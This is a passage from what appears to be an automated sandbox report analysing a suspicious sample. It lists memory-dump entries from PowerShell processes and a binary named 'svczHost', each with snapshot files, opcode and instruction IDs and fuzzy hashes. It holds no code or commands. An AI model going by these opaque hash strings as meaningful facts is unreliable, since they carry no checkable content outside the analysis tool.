                                                                                                                              • Opcode Fuzzy Hash: 20fd94e17b07bab3f7feeee6ea2697f70392b81b16a6d1ce0c656cd80388ae2d
                                                                                                                              • Instruction Fuzzy Hash: 0CA1B52751F2919EE7427B7DB8520DA7B70EF4227DB0843B7D1C8CE093DA1C644A87A9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2473677749.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 52f27e8fcfbc55ae288565da200b0cb77fcb9285dc9c6d0c638b02700a15f6ca
                                                                                                                              • Instruction ID: 8b7eb60fcbdf592b8fdf54458422e6abe18eab72aa9d10fc2bfd85f2ecb00ce1
                                                                                                                              • Opcode Fuzzy Hash: 52f27e8fcfbc55ae288565da200b0cb77fcb9285dc9c6d0c638b02700a15f6ca
                                                                                                                              • Instruction Fuzzy Hash: F361D52791F1A59AE7417B7DB8560EA7B70FF4127CB0843B7C1C88E093DE1C644A87A8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2473677749.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a4e1b8bfccdcd0c02ddd6ee44c5a9cd5960ab7f18739038a83fcb26922867c23
                                                                                                                              • Instruction ID: c2deb7d1c26a30081e6f80b8990ef696093a10235de83ae163f2c49d50c9715b
                                                                                                                              • Opcode Fuzzy Hash: a4e1b8bfccdcd0c02ddd6ee44c5a9cd5960ab7f18739038a83fcb26922867c23
                                                                                                                              • Instruction Fuzzy Hash: DF51222791F1A2A9E75177BD74551EA6F60EF423BCF0843B7D5CC8D0839E0C208686B9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.2373966078.00007FF848DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DFD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_7ff848dfd000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: bb751f83d8b9ae13e27aa3687134e73e7a77cd796af3a870e15477aebe61a267
                                                                                                                              • Instruction ID: 89dc077233cfb4a3d40c92566a4a7a0d2a8c5e77b0829ae23bde928e680a7107
                                                                                                                              • Opcode Fuzzy Hash: bb751f83d8b9ae13e27aa3687134e73e7a77cd796af3a870e15477aebe61a267
                                                                                                                              • Instruction Fuzzy Hash: C541047180EBC44FE7569B389855A523FF0EF56320F1906DFD088CB1A3D725A84AC792
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.2374763580.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_7ff848f10000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9553aa6ff5f2106566b34b3483edf5ad8aec76c22e59e538eec59ffd1cc5650e
                                                                                                                              • Instruction ID: 8224d9298e2a11d24a70c39aab889016fbbb86715145249ed8644064a3aa24d8
                                                                                                                              • Opcode Fuzzy Hash: 9553aa6ff5f2106566b34b3483edf5ad8aec76c22e59e538eec59ffd1cc5650e
                                                                                                                              • Instruction Fuzzy Hash: 2A01677111CB0C4FDB44EF0CE451AA6B7E0FB95364F50056EE58AC3695D736E881CB45
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.3461534491.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_7ff848ff0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6e3eee70a7243924af38da33feecde52df354ca171aec8bf9c86178dccf54406
                                                                                                                              • Instruction ID: ca27151076a5b078db0b764f3f1c6be21d16d5186ab1efa299463d30a3a480bb
                                                                                                                              • Opcode Fuzzy Hash: 6e3eee70a7243924af38da33feecde52df354ca171aec8bf9c86178dccf54406
                                                                                                                              • Instruction Fuzzy Hash: D7A25532E1EBCA4FE756AB2858552B47FE1EF56360F0801FBC149C71D3EA18AC068356
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.3505587438.00007FF849460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849460000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_7ff849460000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9e1ee68ce8e1dfd32b0cdec955599600842177f801e042112bce2f3e94d032e6
                                                                                                                              • Instruction ID: 4a6c1789fbe0543fa71fae5651626c73928d2ff606245be765e6a840de06da75
                                                                                                                              • Opcode Fuzzy Hash: 9e1ee68ce8e1dfd32b0cdec955599600842177f801e042112bce2f3e94d032e6
                                                                                                                              • Instruction Fuzzy Hash: 32911672E0DBC95FE7A6AB289815AB17BE1EF5A351F0801FBD049C71A3DA1CAC05C351
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.3456155148.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7b3d5cd9be5ecf13f94acd844521c2acb20f7d349063b35e1d2d5a107885a47c
                                                                                                                              • Instruction ID: 61eb6c264e732cbdf4764a26fcdd3bb19e195dfe3c0a0f319e811fb09a79af0b
                                                                                                                              • Opcode Fuzzy Hash: 7b3d5cd9be5ecf13f94acd844521c2acb20f7d349063b35e1d2d5a107885a47c
                                                                                                                              • Instruction Fuzzy Hash: E741E530A0C9498FEB94EF18D445BBA7BE1EF65790F1400B9E409C72D2DB2AEC958785
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.3456155148.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ae224982fd9d4cd5f03b0e5db3ea02b1987240bea614ff0e64604f5f2d5679a9
                                                                                                                              • Instruction ID: 98211a14ed7a250905758144df2a138fe43f890355893115eeba9ea1f30a7ef1
                                                                                                                              • Opcode Fuzzy Hash: ae224982fd9d4cd5f03b0e5db3ea02b1987240bea614ff0e64604f5f2d5679a9
                                                                                                                              • Instruction Fuzzy Hash: A4411832D0DA994FEB51EBA4A8152E9BBF0FF55350F0401BBC44CD71D2DF29A8058791
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.3451256399.00007FF848E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E0D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_7ff848e0d000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c45d5a4e7044b36433eb840ba4e91d5ffc2682fac30098891d625acdfa3b98f6
                                                                                                                              • Instruction ID: 899a5962503f9e9fefebf8cac8476b892b16f21ee1acf9de9a33cd615b3f9ff5
                                                                                                                              • Opcode Fuzzy Hash: c45d5a4e7044b36433eb840ba4e91d5ffc2682fac30098891d625acdfa3b98f6
                                                                                                                              • Instruction Fuzzy Hash: F541287180DBC54FE7569B2998559523FF0FF57320F0905EFD088CB1A3E625A845C792
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.3505587438.00007FF849460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849460000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_7ff849460000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ab1940fdd476e27a12d2b0a8d1847ffddd37643a392784c51a64d97c7ffb6cec
                                                                                                                              • Instruction ID: 3cdb03dc2ed760a5b930645c3d507062df0df6cac56202069c42633eaedf8fea
                                                                                                                              • Opcode Fuzzy Hash: ab1940fdd476e27a12d2b0a8d1847ffddd37643a392784c51a64d97c7ffb6cec
                                                                                                                              • Instruction Fuzzy Hash: 79314952E0DBC62FE7AA9A3C68541B16FE1EF96250B0D01F7C189C75D7D80C8C46C351
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.3461534491.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_7ff848ff0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2d39a2d19a4aeff72ec9badd17b062b8c389fb49efffc870a86089fae4b6c8ed
                                                                                                                              • Instruction ID: de5fb9032a50537e3776aefd989fdf1df8d3ef6625ef8ade7aebdd8ed072ede6
                                                                                                                              • Opcode Fuzzy Hash: 2d39a2d19a4aeff72ec9badd17b062b8c389fb49efffc870a86089fae4b6c8ed
                                                                                                                              • Instruction Fuzzy Hash: 2021E432E2DA874FE7A6EB1C585017866D1EF44391F8900BBC20EC71E2DF18EC008359
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.3461534491.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_7ff848ff0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6516570ce9cf58e9676326860df694385689a8ad2db2e29f0a1dcba34cdcb8d9
                                                                                                                              • Instruction ID: 491a6380c1f157b49be994638e820d9a08172051398b2080a5ffbcb986dc3834
                                                                                                                              • Opcode Fuzzy Hash: 6516570ce9cf58e9676326860df694385689a8ad2db2e29f0a1dcba34cdcb8d9
                                                                                                                              • Instruction Fuzzy Hash: 85119E32D2D94A4FEBA5AB28A8545B47BD0FF043A0F0D00B7D15AD75EADB1CAC148749
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.3456155148.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d1557cc1a5c8bae24fc8511f805bc0c89949688b9e023eb6a4c4e254d5256d71
                                                                                                                              • Instruction ID: 0210a2ece182f4b3288d89776c73112067291c528c38848e716190e160216beb
                                                                                                                              • Opcode Fuzzy Hash: d1557cc1a5c8bae24fc8511f805bc0c89949688b9e023eb6a4c4e254d5256d71
                                                                                                                              • Instruction Fuzzy Hash: 3C11E16494E6C56ED743A73878209B2BFE8DF83365B0805EFE0D8864D3D909194AC3A6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.3456155148.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6cd3c5edcfc4eabbb544dbac2731316c486421f419c4adbba40ab582c5cd9bae
                                                                                                                              • Instruction ID: fdb9ed959dcf7fe6ad1862c24dcb6812826ebe7a2caaf0f058da412c3914bfed
                                                                                                                              • Opcode Fuzzy Hash: 6cd3c5edcfc4eabbb544dbac2731316c486421f419c4adbba40ab582c5cd9bae
                                                                                                                              • Instruction Fuzzy Hash: 8C01677115CB0C4FD748EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.3456155148.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 62a6fc8e48910c5b87b6eb328e895929581b8aa56c56b3129b86bb14ab9d4429
                                                                                                                              • Instruction ID: 361aac689b57214b403f86cd66ed6c3731ee736c695c86d2b327dde9bb2d5834
                                                                                                                              • Opcode Fuzzy Hash: 62a6fc8e48910c5b87b6eb328e895929581b8aa56c56b3129b86bb14ab9d4429
                                                                                                                              • Instruction Fuzzy Hash: 81F0C821A1EE995FE345A72CA41526477A1EB89340F1940FAC048CB2C3CF1D5C058396
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.3505587438.00007FF849460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849460000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_7ff849460000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d3a39b851e86c9faad24e109c3c1757e91669092a87b42afda286c5524dd8719
                                                                                                                              • Instruction ID: 8bf0de622cf344d760f47ae825cfa4ad2491377da8663700c5284db9c4c293f5
                                                                                                                              • Opcode Fuzzy Hash: d3a39b851e86c9faad24e109c3c1757e91669092a87b42afda286c5524dd8719
                                                                                                                              • Instruction Fuzzy Hash: 3FF0A03131CF044FE748EE2DE4497A2B3E0FBA8350F14462FE44AC3291DA21E8818782
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.3505587438.00007FF849460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849460000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_7ff849460000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6136a596bdcf9b00c0089b00bc82c32d3e17d872a36856ae9f9cfda05d5a6bc0
                                                                                                                              • Instruction ID: d638480a74cdca0af4a55b5cf4093b259eeb9b388243c253cc03bee6460054b4
                                                                                                                              • Opcode Fuzzy Hash: 6136a596bdcf9b00c0089b00bc82c32d3e17d872a36856ae9f9cfda05d5a6bc0
                                                                                                                              • Instruction Fuzzy Hash: FFE08C32A0C405AEE314BA08F4064F8B3E0FF04260B1401B2E11EC2857DA2678528641
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.3505587438.00007FF849460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849460000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_7ff849460000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5e49839420d444463e8889ee12768809baff74ee874df2461ff922f73828a9be
                                                                                                                              • Instruction ID: 3a366c666f772b48dbf2ca7312b98508a2d3f6dca78bf5f45da108974d6e240b
                                                                                                                              • Opcode Fuzzy Hash: 5e49839420d444463e8889ee12768809baff74ee874df2461ff922f73828a9be
                                                                                                                              • Instruction Fuzzy Hash: 74D022A390C9B20AD26C561EB8E50F0E7D1EAC8231308807BC0AAC26A4E40C08C64390
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000014.00000002.3596984020.00007FF7173E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7173E0000, based on PE: true
                                                                                                                              • Associated: 00000014.00000002.3596941349.00007FF7173E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                              • Associated: 00000014.00000002.3597557996.00007FF71785F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                              • Associated: 00000014.00000002.3597736691.00007FF7179D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                              • Associated: 00000014.00000002.3597736691.00007FF717AE7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                              • Associated: 00000014.00000002.3597736691.00007FF717AEA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                              • Associated: 00000014.00000002.3598160603.00007FF717CF5000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                              • Associated: 00000014.00000002.3598192391.00007FF717CF6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                              • Associated: 00000014.00000002.3598192391.00007FF717D0F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                              • Associated: 00000014.00000002.3598192391.00007FF717D12000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                              • Associated: 00000014.00000002.3598192391.00007FF717D14000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                              • Associated: 00000014.00000002.3598328445.00007FF717D17000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_20_2_7ff7173e0000_svczHost.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2933794660-0
                                                                                                                              • Opcode ID: 0f3f96051d0eb21c3945a3f0a1a11fbbf54d8e2d0602f5fb5ac0557b9058b17e
                                                                                                                              • Instruction ID: 7b7653dfa23f63115196a09b4766e62359ed893ba176e2f1d4aff106dee47901
                                                                                                                              • Opcode Fuzzy Hash: 0f3f96051d0eb21c3945a3f0a1a11fbbf54d8e2d0602f5fb5ac0557b9058b17e
                                                                                                                              • Instruction Fuzzy Hash: 36117026B54F068AEB00DF70E8542B873A4FB19768F840E31DE2D427A9DF78D5998350
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000018.00000002.3566668214.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_24_2_7ff848f40000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d8d96645f6bc468165195766f6cf1354d146784f57a2a80c813161c627a5c678
                                                                                                                              • Instruction ID: a7981ab354a289298525a04be60c240bb4b92fadd355d551e3957fcc8fb942a2
                                                                                                                              • Opcode Fuzzy Hash: d8d96645f6bc468165195766f6cf1354d146784f57a2a80c813161c627a5c678
                                                                                                                              • Instruction Fuzzy Hash: 8FF1A43090CA8D8FEBA8EF28C8557E937E1FF64750F14426ED84DC7295CB7899458B82
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000018.00000002.3566668214.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_24_2_7ff848f40000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ce1bdff7fb18daebd51a1365d78dc293ceea01299dfd09672b604274c84939aa
                                                                                                                              • Instruction ID: 0a362e506571f1735a70155910e0b9a6817634e05f46bc34365bc2e8b2c88eeb
                                                                                                                              • Opcode Fuzzy Hash: ce1bdff7fb18daebd51a1365d78dc293ceea01299dfd09672b604274c84939aa
                                                                                                                              • Instruction Fuzzy Hash: 9DE1B13091CA8E8FEBA8EF28C8557E977D1FB64750F54426ED84DC7291DB78A8408B81
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000018.00000002.3566668214.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_24_2_7ff848f40000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 152e2fbe9cf8c1d8f11a4f2fd7718137bb6d4cd745e523562a14a0b6bbb4906c
                                                                                                                              • Instruction ID: 34041bb097dce373fc911a11d7fc0aaa8a361ac004e23c6ed93cf925f70e7e26
                                                                                                                              • Opcode Fuzzy Hash: 152e2fbe9cf8c1d8f11a4f2fd7718137bb6d4cd745e523562a14a0b6bbb4906c
                                                                                                                              • Instruction Fuzzy Hash: E1B1B23051CA494FEB68EF28C8557E93BE1FB65350F44426EE84DC7292CB38A9408B86
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000018.00000002.3566668214.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_24_2_7ff848f40000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9d7bc8108539eba154814bdcc3b2fb0612c92c895b02a99cbb4ca073f11f0c3e
                                                                                                                              • Instruction ID: 3b12dbae86eab256681113df961cb1d0739c92024eec463c005c15e99e968e47
                                                                                                                              • Opcode Fuzzy Hash: 9d7bc8108539eba154814bdcc3b2fb0612c92c895b02a99cbb4ca073f11f0c3e
                                                                                                                              • Instruction Fuzzy Hash: B0310A3081DA4E8EFBB4AB24CC0ABF932A0FF51759F40513AD84DD61D2DB396985CB15
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000018.00000002.3566668214.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_24_2_7ff848f40000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                              • Instruction ID: 8501ce2366aa47fe50c32cae5305b62a305da60d827aaf0f190e9b8a75457062
                                                                                                                              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                              • Instruction Fuzzy Hash: 8B01447111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB26E882CB45
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000001C.00000002.3576272662.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_28_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0~#I$8|#I$X}#I$x~#I$}#I
                                                                                                                              • API String ID: 0-2979404571
                                                                                                                              • Opcode ID: b20ccc8eb43167098ba32ab82d4248c1e06da3941e54971e1c19429db10457ff
                                                                                                                              • Instruction ID: 8151d67e1afb6f7e1b7615ee339c26114a73dc3c3681387a4329a8be805ebcd0
                                                                                                                              • Opcode Fuzzy Hash: b20ccc8eb43167098ba32ab82d4248c1e06da3941e54971e1c19429db10457ff
                                                                                                                              • Instruction Fuzzy Hash: 6FE1F271D0DE8A4FEB69E73868252B97BA0EF66350F0401BEC049C71D7DF25A8098795
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000001C.00000002.3576272662.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_28_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0~#I$8|#I$X}#I$x~#I$}#I
                                                                                                                              • API String ID: 0-2979404571
                                                                                                                              • Opcode ID: 761b57cfa8b1389c095dc95257cfbc6279ef14692d57fd944b48df05d237b4e5
                                                                                                                              • Instruction ID: f716c235fd49e0156694ce5c4ffbfa32b78aa3b50484b67e5784fa24fcdb62c0
                                                                                                                              • Opcode Fuzzy Hash: 761b57cfa8b1389c095dc95257cfbc6279ef14692d57fd944b48df05d237b4e5
                                                                                                                              • Instruction Fuzzy Hash: 1AB11671E1DECA0FEB69A73868212797BE1EF61790F0401BAC049C71C7DF29AD098395
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000001C.00000002.3576272662.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_28_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0~#I$8|#I$`{#I$x~#I
                                                                                                                              • API String ID: 0-2172937309
                                                                                                                              • Opcode ID: ef6b4334771edf6352577fff66963aafda19735dd4e89962344c7971a1fbcf76
                                                                                                                              • Instruction ID: 8de8d28c0288553870ce99db428ba1d49a287d57201f1518ef29cdea75c85b2f
                                                                                                                              • Opcode Fuzzy Hash: ef6b4334771edf6352577fff66963aafda19735dd4e89962344c7971a1fbcf76
                                                                                                                              • Instruction Fuzzy Hash: 8EF065A3D1FEC60FF26A963838200352EA9BBA3B90B0901F7C044871DB9B159E0D4399
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000001C.00000002.3576272662.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_28_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Pp#I$Pp#I
                                                                                                                              • API String ID: 0-4095597710
                                                                                                                              • Opcode ID: b02d77b7b5ea55e12b5b4bcc88e9ecba225066bc4c31d2f363debe532d743934
                                                                                                                              • Instruction ID: d426fcd123bb1673558054ea27ce252c89d2dcdf55bb46557991c65b5a7a55a4
                                                                                                                              • Opcode Fuzzy Hash: b02d77b7b5ea55e12b5b4bcc88e9ecba225066bc4c31d2f363debe532d743934
                                                                                                                              • Instruction Fuzzy Hash: 3B71B07091DA4D9FDB58EB68A8515FDBBF1FF98350F00063EE08AD3286DF2968068745
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000001C.00000002.3576272662.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_28_2_7ff848f20000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Pp#I$Pp#I
                                                                                                                              • API String ID: 0-4095597710
                                                                                                                              • Opcode ID: 19cb0132f8e2bfdb66b81c39e56c37021f9dcc96c0e3990365486b8d422182f6
                                                                                                                              • Instruction ID: 889c6bbcfa9bef41dc8d3082479a67355259f6329822ed0ef2c864f9b0f293f6
                                                                                                                              • Opcode Fuzzy Hash: 19cb0132f8e2bfdb66b81c39e56c37021f9dcc96c0e3990365486b8d422182f6
                                                                                                                              • Instruction Fuzzy Hash: AB61C03190CA5C8FDB69EB18D8457E9B7F0FF68310F0042AAD04DE7291DB7569858B85
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
